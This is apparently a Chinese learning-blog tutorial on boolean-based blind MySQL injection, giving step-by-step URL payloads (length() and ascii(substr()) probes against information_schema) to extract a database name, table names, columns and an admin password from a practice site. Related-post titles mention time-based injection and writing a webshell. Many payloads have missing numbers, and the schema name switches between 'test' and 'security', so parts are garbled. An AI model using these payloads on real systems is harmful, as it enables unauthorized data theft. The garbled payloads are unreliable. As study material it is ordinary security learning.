大哥带我们的mysql注入 基于bool的盲注
盲注 那么我们来了解一点盲注的语法
这里面是语法的介绍
https://blog.csdn.net/alex_seo/article/details/82148955
0X01第一步我们先判断当前数据库的长度
语法构造
/index.php?id=%20and%20length((select%20database()))%3E3 正确
index.php?id= and length((select database()))>4 错误

那我们确定数据库名字大于3不大于4 那么数据库长度就是4了
0X02爆数据库名称
http://www.php-sqli.net/index.php?id=1%20and%20ascii(substr((select%20database()),1,1))%3E1 正确
?id= and ascii(substr((select database()),,))>100 真确
id= and ascii(substr((select database()),,))>115正确
?id=1 and ascii(substr((select database()),1,1))>116 错误
那我们得到数据库的第一个位置的数据的ascii是116 =>t
继续爆第二个
?id= and ascii(substr((select database()),,))>100 正确
?id= and ascii(substr((select database()),,))>101 错误
那么第二个字母是 101=>e
继续爆第三个
?id= and ascii(substr((select database()),,))>114 正确
?id= and ascii(substr((select database()),,))>115 错误
第三个字母 115=> s
第四个
?id= and ascii(substr((select database()),,))> 真确
?id= and ascii(substr((select database()),,))>116 错误
第四个 => 116 t
那么我们的数据库的名称应该是test
0X02爆表名
先判断有多少个表
1' and (select count(*) from information_schema.tables where table_schem=database())>5#
这里我不知道语法
然后第一个表的长度
id= and length((select table_name from information_schema.tables where table_schema='test' limit ,))>
这里可以看见正确
id=1 and length((select table_name from information_schema.tables where table_schema='test' limit 0,1))>5 错误
那么第一个表长度为4
爆第一个表的表名的第一个字母
?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>1 正确
?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>100 正确
?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>101 错误
那么这里我们知道表名的第一个之母是101=>e
第二个字母的爆破
?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>108 正确
?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))>109 错误
那么第二个字母 =>109 m
爆到这里不爆了 大概是email
我们开始爆破第二个表
?id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>100 正确
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>114 错误
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))>113 正确
第一个字母是114=>r
不是admin不想要
第三个表
id= and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit ,),,))>116 正确
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 2,1),1,1))>117 错误
第一个字母 117=> u
这个人肯定是users表 不多bb了盲注太烦了直接爆 列名
卧槽 库名是test 我要写成security 打错特错
0X03爆列名
操作和爆破表名的操作是一样的
这里我们爆破出来是 username 和password
0X04爆字段
password
ascii(substr((select password from admin limit ,),,))>
查内容 我们在查我们的密码 在admin表里面的password列里面
大哥带我们的mysql注入 基于bool的盲注的更多相关文章
- 大哥带我们的mysql注入 基于时间的盲注
?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and = ...
- 大哥带我们的mysql注入
这是今天的任务 任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell, 都是 ...
- mysql order by基于时间的盲注
order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就 ...
- mysql基于“时间”的盲注
无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...
- 深入浅出带你玩转sqlilabs(五)-布尔/延时盲注与二次注入
SQL测试-基于布尔,延时盲注 布尔,延时注入常用到的判断语句 regexp regexp '^xiaodi[a-z]' 匹配xiaodi及xiaodi...等 if if(条件,5,0) 条件成立 ...
- SQL基于时间的盲注过程
0x00 前言 由于要使用到基于时间的盲注,但是我觉得基于时间的盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了: 首先我觉得基于时间的盲注和基于布尔的盲注的最直观的差别就是 ...
- DVWA-基于布尔值的盲注与基于时间的盲注学习笔记
DVWA-基于布尔值的盲注与基于时间的盲注学习笔记 基于布尔值的盲注 一.DVWA分析 将DVWA的级别设置为low 1.分析源码,可以看到对参数没有做任何过滤,但对sql语句查询的返回的结果做了改变 ...
- Python:SQLMap源码精读—基于时间的盲注(time-based blind)
建议阅读 Time-Based Blind SQL Injection Attacks 基于时间的盲注(time-based blind) 测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以 ...
- Python:SQLMap源码精读—基于错误的盲注(error-based blind)
目标网址 http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 Payload的生成 <test> <title>MyS ...
随机推荐
- python中魔法方法__str__与__repr__的区别
提出问题 当我们自定义一个类时,打印这个类对象或者在交互模式下直接输入这个类对象按回车,默认显示出来的信息好像用处不大.如下所示 In [1]: class People: ...: def __in ...
- 会引起全表扫描的几种SQL 以及sql优化 (转)
出处: 查询语句的时候尽量避免全表扫描,使用全扫描,索引扫描!会引起全表扫描的几种SQL如下 1.模糊查询效率很低: 原因:like本身效率就比较低,应该尽量避免查询条件使用like:对于like ‘ ...
- 学习WPF-1
学习WPF-1 最近到新公司,需要使用WPF来做界面开发,我原先是使用WinForm来做界面开发的,所以对于现在使用WPF来开发,需要先学习一段时间了,考核的内容目前也还没定下来做什么, 但终归是使用 ...
- Dynamic Compilation and Loading of .NET Objects
This is another approach to dynamic compilation of objects and their usage via Interfaces. Introdu ...
- qt QAbstractItemModel一些方法介绍
一. virtual bool setData(const QModelIndex &index, const QVariant &value, int role = Qt::Edit ...
- Windows Server IIS设置计划任务重启
Windows Server ,IIS设置计划任务重启. echo ----->>c:\log_iisreset.txt && echo %date% %time% &g ...
- 脚本_通过进程与端口判断myslq服务
#!bin/bashif [[ $port -eq 1 || $porcess -eq 2 ]];then #通过条件判断端口和进程执行的返回值. echo "mysql is s ...
- Python核心技术与实战——十四|Python中装饰器的使用
我在以前的帖子里讲了装饰器的用法,这里我们来具体讲一讲Python中的装饰器,这里,我们从前面讲的函数,闭包为切入点,引出装饰器的概念.表达和基本使用方法.其次,我们结合一些实际工程中的例子,以便能再 ...
- bootstrap-table给每一行数据添加按钮,并绑定事件
https://blog.csdn.net/mht1829/article/details/72633100 https://blog.csdn.net/qq_39215166/article/det ...
- 跨域 (2) cors
html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF- ...